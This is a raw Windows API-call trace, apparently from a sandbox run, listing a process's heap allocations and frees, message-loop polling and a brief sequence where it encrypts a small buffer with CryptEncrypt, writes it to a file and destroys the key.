[0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.635] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.635] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.635] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0091.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.636] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0091.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0091.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0091.638] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.638] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.638] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.638] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.638] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.638] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.638] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0091.638] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.638] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0091.639] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.639] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0091.639] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0091.639] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0091.676] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 1 [0091.676] TranslateMessage (lpMsg=0x144e8fc) returned 0 [0091.676] DispatchMessageW (lpMsg=0x144e8fc) returned 0x0 [0091.676] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0091.676] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0091.676] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.677] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0091.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0091.677] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xbe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xc0) returned 1 [0091.677] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.678] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.678] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.678] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.678] CharLowerBuffW (in: lpsz="byte[193]", cchLength=0x9 | out: lpsz="byte[193]") returned 0x9 [0091.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0091.678] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4365138*, pdwDataLen=0x144e538*=0xbe, dwBufLen=0xc0 | out: pbData=0x4365138*, pdwDataLen=0x144e538*=0xc0) returned 1 [0091.678] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.678] WriteFile (in: hFile=0x258, lpBuffer=0x43ec5d0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x43ec5d0*, lpNumberOfBytesWritten=0x144ef3c*=0xc0, lpOverlapped=0x0) returned 1 [0091.680] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0091.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca6e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0091.680] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0091.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0091.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0091.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0091.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0091.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0091.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0091.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0091.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0091.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0091.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0091.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0091.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0091.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0091.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0091.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0091.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0091.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0091.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 